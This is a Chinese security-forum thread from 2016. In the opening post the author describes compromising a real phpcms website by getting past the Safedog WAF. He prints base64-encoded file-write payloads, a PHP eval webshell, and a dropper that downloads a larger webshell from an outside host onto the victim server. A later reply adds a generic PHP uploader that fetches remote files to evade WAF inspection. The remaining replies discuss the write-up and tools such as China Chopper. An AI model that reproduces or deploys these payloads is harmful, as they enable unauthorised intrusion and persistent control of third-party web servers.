【已转正】记一次过狗记录

这是一个小站phpcms的，开始尝试phpcms历代exp。哟，member未开放，sql注入不进有安全狗，在经过，各种xxoo之后终于发现一个突破点，还是一个不小的突破点命令注入。。

呵呵，我笑了。。。这太easy啦。直接执行小马试试，，


难道过滤了，好吧，直接写文件，
，
，

wox，不存在，好吧，这里就不啰嗦了，其实文件是写进去了的，但'file_s.php'被过滤为'file_sphp'；好吧，改策略吧，直接对文件名base64

file_put_contents(base64_decode('RDpcXHdlYnJvb3RcXGZpbGVfc3MucGhw'),'hahhah');;;

ok,成功，好吧开始小马，，这里也再啰嗦了，小马也必须采用base64_decode的方式，因为他过滤了eval，=,<,>,?。。。也就是这样

file_put_contents(base64_decode('RDpcXHdlYnJvb3RcXGZpbGVfc3MucGhw'),base64_decode('Jmx0Oz9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8mZ3Q7'));

你以为这样就结束了吗？？no。。。


wo *?x*&^%!...xx个安全狗。。好吧逼我上大马，，but，大马这么大，而且用base64加密后始终都有特殊字符=，怎么办了，，这事脑子里突然灵光一闪，e，不是还有个file_get_contents函数吗，，哈哈好吧就这么来，先来一个echo

file_put_contents(base64_decode('RDpcXHdlYnJvb3RcXGZpbGVfbGluZXMucGhw'),base64_decode('ICZsdDs/cGhwIGVjaG8gZmlsZV9wdXRfY29udGVudHMoJiMzOTtEOlxcd2Vicm9vdFxcZmlsZV9sLnBocCYjMzk7LGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LmxlZm8tbWFsbC5jb20vbWVtYmVyL2dnLnR4dCIpKTs7PyZndDth'));;;

后面这个base64解密后就是

<?php echo file_put_contents('D:\\webroot\\file_l.php',file_get_contents("http://www.lefo-mall.com/member/gg.txt"));;?>a

这串代码，即先写一个file_lines.php，而这个文件里存入

<?php echo file_put_contents('D:\\webroot\\file_l.php',file_get_contents("http://www.lefo-mall.com/member/gg.txt"));;?>a

这串代码，然后我再访问file_lines.php这个文件执行file_put_contents这个函数将http://www.lefo-mall.com/member/gg.txt的内容写进file_l.php这个文件，
，
哈哈，成了大马传进去了，，好吧，，后面的提权什么的，留着后面提取，还有数据库还原，留着后面再做，因为有安全狗一切一般数据操作都不行，得写一个数据库管理的加密脚本才行，，
最后真心希望能通过审核，能有机会和大神门学习交流。。。好累啊。。。。。。

===================================
超过3位九零元老同意，转正成功！
                        管理05

sorry，，太心急了，，等一下，我改一下。。

不知道作者在写什么，看你应该也是写过代码的人，写东西要简洁、清晰、思路清楚、表达清楚，知道吗。

管理05 发表于 2016-7-22 11:26
1.态度不端正
2.标题都有错别字？
3.版面这样你给谁看？

大神，在帮忙看看，第一次发这类的帖子，，操作不熟练。。。

skyjson 发表于 2016-7-22 11:34
大神，在帮忙看看，第一次发这类的帖子，，操作不熟练。。。

可以了，内容还是可以的

atom 发表于 2016-7-22 11:33
不知道作者在写什么，看你应该也是写过代码的人，写东西要简洁、清晰、思路清楚、表达清楚，知道吗。

，，，，，第一次写，，写得好像确实不是很清晰。。。

给一票吧  继续努力。

piaoker 发表于 2016-7-22 12:16
给一票吧  继续努力。

thanks，，，

绕过应用级waf上传(说白了就是通过远程下载实现上传功能，主机不能外联就gg)

0x01 背景

应用级waf为了不影响本身网站程序使用，往往不限制本地的函数执行，而是检测传递参数的内容，遇到规则内容，就产生拦截（菜刀数据一般是拦截对象）。

如果已经上传webshell可以使用下载来绕过waf参数内容检测。

0x02利用方式

1、asp网站

使用asp一句话客户端（遇到安全狗要使用过狗马）

http://www.cnblogs.com/kenn0626/archive/2012/08/10/2633116.html
2、php网站

<?php $a=$_GET[shell];$b=$_GET[source];file_put_contents($a,file_get_contents($b));?>

example: 使用 1.php?shell=123.php&source=http://ip/1.txt

skyjson 发表于 2016-7-22 11:43
，，，，，第一次写，，写得好像确实不是很清晰。。。

现在写的比之前好多了，全文亮点是过狗，能说下这个漏洞怎么挖的，更好。

其实你遇到的只有一个问题，就是怎么将传输的数据不带敏感字眼。
完成的操作是需写马以及骑马。你着重讲了怎么写马，绕waf，而另一个关键是骑马，骑马就是对本地的操作。
你直接将大马写进去可能会产生一些问题，比如它的一些功能直接调用了系统函数或者说危险函数，但这些如果恰好在配置文件中给禁了，那就比较麻烦了。
这时需要用一些技巧性的东西。最后能执行系统命令当然是最好的。
挺好的，期待你后面怎么拿下服务器的，加油。

怎么发现的这个命令执行漏洞

要是我的话，可能找个过狗马写进去然后找刀连一下

Jumbo 发表于 2016-7-22 18:44
要是我的话，可能找个过狗马写进去然后找刀连一下

e，菜刀连过去的时候会被拦截，因为菜刀会显示的传个eval过不了。。。好怀恋乌云啊。。乌云什么时候才能回归哦。。我的rank。我的漏洞库

管理05 发表于 2016-7-22 11:35
可以了，内容还是可以的

兄弟，问个事啊，，这个待定应该咋算啊。。。看样子，估计后天这票是凑不齐了。。。

我感觉挺好的，大兄弟把文章编辑好，流程清晰些，是一篇挺棒的文章

感觉挺好 反正我点的通过

cnqing 发表于 2016-7-23 22:35
感觉挺好 反正我点的通过

谢啦兄弟

我现在就想知道你这个洞是咋挖的。

我是来看看有木有过狗一句话的，么么哒

看着不错，又学习了

支持

小莫 发表于 2016-7-27 00:24
我现在就想知道你这个洞是咋挖的。

哈哈，，，只是一个phpcms的一个洞，，乌云上有全解。。。真怀恋wooyun啊。

skyjson 发表于 2016-7-28 10:41
哈哈，，，只是一个phpcms的一个洞，，乌云上有全解。。。真怀恋wooyun啊。

赶紧说明清楚撒。